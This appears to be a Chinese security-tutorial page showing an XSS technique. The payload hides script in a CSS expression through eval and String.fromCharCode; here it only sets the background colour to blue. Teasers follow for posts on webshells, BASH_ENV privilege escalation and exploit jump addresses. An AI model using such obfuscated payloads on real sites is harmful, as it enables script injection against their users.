expression&eval跨站的一个方法
所属分类:
实用技巧 / 安全教程
阅读数:
569
收藏 0赞 0分享
expression这个CSS的属性很多程序都没有过滤好,很容易被跨,不知道用就参考剑心的幻影论坛跨站脚本漏洞测试过程.
我这里要说的是另外一种方法,使用String.fromCharCode方法把ASCⅡ码转换为字符再用EVAL函数执行.
<img src="https://zhanzhang360.qulang.net/imgupload/006980/#" style="Xss:expression(eval(
String.fromCharCode(100,111,99,117,109,101,110,116,46,98,103,67,111,108,111,114,61,34,98,108,117,101,34)));">
嘿嘿,大把的XSS等你去挖掘,ENJOY IT :)
非常不错的脚本入侵基础知识总结第1/2页
简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。
收藏 0赞 0分享
linux提权用的一个技巧
一个linux提权用的技巧,放出来全当找工作攒RP了。 OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本
收藏 0赞 0分享
一些通用跳转地址,XXOXX的时候有点用
近日在写exploit的时候需要用到一些其他语言的call ebx的跳转地址,但是metasploit的opcode DB没有包括繁体中文、日文、韩文机器的跳转地址,所以费了点时间收集了下,在这里要感谢傲少提供的机器给我去找地址。现在贴到这里,方便大家。
收藏 0赞 0分享
入侵过程中用过的三大门派的几个小工具[推荐]
vbs在入侵中的作用、我在入侵中的注意的细节、跨站、入侵中的批处理、入侵过程中用的小工具共有这五个,当然随着期数的变化,出的题目也会增加,现在大家针对这些题目欢迎来稿呀,不要被高手这两个字吓住了。
收藏 0赞 0分享
查看更多